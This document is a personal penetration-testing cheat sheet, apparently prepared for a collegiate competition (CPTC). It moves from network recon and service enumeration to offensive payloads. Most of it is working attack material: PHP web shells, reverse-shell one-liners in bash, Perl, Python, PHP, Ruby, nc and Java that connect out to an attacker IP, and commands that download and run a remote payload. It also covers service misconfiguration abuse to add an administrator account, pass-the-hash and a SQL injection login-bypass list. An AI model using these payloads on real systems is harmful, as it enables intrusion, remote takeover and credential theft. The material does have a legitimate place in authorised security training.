CPTC Notes:

------------------------------------------------------
Configurations:
  Metasploit.rc
  load auto_add_route
  setg ExitOnSession false
  load alias
  alias handler use exploit/multi/handler
  setg TimestampOutput true
  setg VERBOSE true
  alias del rm
-----------------------------------------------------
Intial Recon:
  - route -n
  - Wireshark to check for any traffic
  - Obtain hosts: nmap -sn 192.168.1.0/24
  - Find domain controllers: nmap -p 53 192.168.1.0/24 | grep "domain"
  - Zone transfer misconfig: dnsrecon
  - Brute force host names:
    for ip in $(seq 0 255); do host 192.168.1.$ip; done
  - theharvester -d cisco.com -b google>google.txt  -Check for emails
--------------------------------------------------------
Port scanning:
Inital port scan all ports on ip:
us -mT -Iv ip:a -r 3000 -R 3 && us -mU -Iv ip:a -r 3000 -R 3
2nd port scan intensive:
nmap -A -v -p- $ip
----------------------------------------------------------
Port 445/139 SMB/Netbios:
- enum4linux -A
- nmap scripts
- rpcclient: rpcclient -U rob 10.11.0.1
enumdomusers
- nbtscan: nbtscan -r
How to SMBclient:
/usr/bin/smbclient \\\\zimmerman\\public mypasswd
------------------------------------------------------------
Port 80/443 HTTP/HTTPS:
Brute Forcing Directories:
dirb
gobuster: gobuster -u http://10.11.1.71/  -w /usr/share/seclists/Discovery/Web_Content/common.txt  -s '200,204,301,302,307,403,500' -e 
CGI Brute force: /usr/share/seclists/Discovery/Web_Content/cgis.txt

burp suite...
nikto
nmap http scripts
------------------------------------------------------------
Port 161 SNMP:
onesixtyone
snmpwalk
-----------------------------------------------------------
Port 21 FTP:
- Check for misconfigurations (anonymous login)
After anonymous login maybe directory transversle
-----------------------------------------------------------
Port 23 Telnet:
- Check for misconfigurations
------------------------------------------------------------
Port 3306/1433 MySQL/MS-SQL 
- MS SQL Use SQSH
- MySQL/MS SQL Check for anonymous
- MS SQL login check for XP_CMDSHELL:
EXEC xp_cmdshell 'dir';  
GO  

--------------------------------------------------------------
*******************New page********************************
----------------------------------------------------------------
PHP Obtaining Shell: 
PHP Shell Commands:
<?php 
echo shell_exec(“ls -la“);
?>  

//Back ticks
<?php
$output = shell_exec('ls -la');
echo "<pre>$output</pre>";
?>

<?php
echo exec("ls -la");
?>

<?php system($_GET['cmd']);?>


<?php
passsthru(“ls -la“);
?>

<?php
preg_replace('/.*/e', 'system("whoami");', '');
?>

Bash:
<?php
preg_replace("bash -i >& /dev/tcp/10.0.0.1/8080 0>&1");
?>

PERL:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PhP:
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby:
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

nc:
nc -e /bin/sh 10.0.0.1 1234

Java:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

PHP Upload shell (I have encountered a Windows machine that allowed me to write php script. The windows machine did not have any file trasnfer shell command such as "wget" or "fetch". Depending on php, the ticks may be important to change ' " ', ' ' '):
<? php
file_put_contents("shell.exe", fopen("http://MYIP/temp/shell.exe", "r"));
?>
Then I would use execute shell commnad, exampled above to execute the file.

null:
path%00

reverse-shell.php.txt


For unix machines a way to get reverse shell if have shell command execute using proccess sub:
/bin/bash -c "perl <(curl http://10.11.0.x/temp/perlshell.pl)"
*******************************new page ***********************
----------------------------------------------------------------
Directory transversele for windows (spaces):
ls ../../../Docume~1/
If want to directory transverse to: "Documents and Settings"
----------------------------------------------------------------
Public exploits:
python standalone
python pyinstaller.py --onefile ms11-080.py  

GCC standalone
gcc -m32 -Wl,--hash-style=both -o exploit 18411.c 
Standalone GCC compiler (If machine does not have GCC)
chmod (file) 	- 	change file perms to be able to execute


Mingw:
 i686-w64-mingw32- gcc(g++) exploit.c -o exploit -lws2_32

in case mingw32 does not support the code such as "__try" , compile in a windows vm:
Visual Studio Developer Command Line  (Developer Command Prompt for VS )
cl ex.cpp /link kernel32.lib shell32.lib user32.lib 

If editting public exploits:
Try to use the same payload
Make sure size of payload is equal or LESS than the size of payload in exploit
If less, add NOPS "\x90"
----------------------------------------------------------------
Code
process.h, string.h, winbase.h, windows.h, winsock2.h - Windows exploit code
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h - Linux exploit code
----------------------------------------------------------------
Hydra Brute Forcing:
hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V
-----------------------------------------------------------------
TTY Shells:
Python TTY Shell Trick
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')

Spawn Interactive sh shell
/bin/sh -i

Spawn Perl TTY Shell
exec "/bin/sh";
perl —e 'exec "/bin/sh";'

Spawn Ruby TTY Shell
exec "/bin/sh"

Spawn Lua TTY Shell
os.execute('/bin/sh')

Spawn TTY Shell from Vi. Run shell commands from vi:
:!bash

Spawn TTY Shell NMAP
!sh
-------------------------------------------------------------------------
Passwords:
hashcat -m 1000 -a 0 /hash.txt /usr/share/wordlists/rockyou.txt  (-m is for NTLM hash cracking)
hash-identifier - Check the type of hash
cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt  - Obtain words on megacorp.com with size 6 and up (Create password to brute force)
crunch - Create password list
--------------------------------------------------------------------------
Priv Esc Windows:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"  

net start  - get services
tasklist /v   - get tasks 
dir *bob*.* /s  	-	locate a file
cacls "C:\path\to\file.exe"  	-	check perms win xp and lower
icacls   - Windows vista and up
tasklist /v

C:\Windows\System32\eula.txt

C:\Windows\System32\License.rtf

Can be found for all these Windows operating systems

Vista, W7, W8, W8.1 

Metasploit:
post/windows/gather/enum_patches
post/multi/recon/local_exploit_suggester

Weak Service Perms:
accesschk.exe -qwcu "Authenticated Users" *
accesschk.exe -qwcu "Users" *
accesschk.exe -qwcu "Everyone" *
if there isn't accesschk, upload it (/usr/share/windows-binary/)
make sure to use "-accepteula" parameter

Edit binary misconfigured service:
Get service
sc config service.exe(Or no exe extention) binpath= "net user offsec password123 /add"
sc start service.exe
sc config service.exe binpath= "net localgroup administrators offsec password123 /add"
sc start service.exe

OR Can move file and add shell in the file location with same filename, and restart service

If this does not work.. try executing a shell instead
sc config service binpath= "C:\path\shell.exe"
sc config service obj= ".\LocalSystem" password= ""
sc start service

Restart service:
wmic service NAMEOFSERVICE call startservice 
net stop [service name] && net start [service name]  

AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

both must contain DWORD of 1

exploit/windows/local/always_install_elevated

dir /b /s web.config
dir /b /s unattend.xml
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*

DLL Hijacking:
use exploit/windows/local/ikeext_service

If you have admin access on a Windows box but want to upgrade to NT Authority/SYSTEM access, simply obtain a meterpreter session and run the getsystem command.  

Pass the hash:
root@kali:~# export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896  

root@kali:~# pth-winexe -U administrator% //10.11.01.76 cmd 

https://www.fuzzysecurity.com/tutorials/16.html
----------------------------------------------------------------------------------------------------
Priv Esc Linux
- Privchecker.py
- https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

----------------------------------------------------------------------------------------------------
Sqli auth bypass list:

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

-------------------------------------------------------------------------------
SecurityFocus
Exploit-DB

----------------------
pty shell:
https://github.com/infodox/python-pty-shells
python tcp_pty_shell_handler.py -b 10.11.0.206:4444
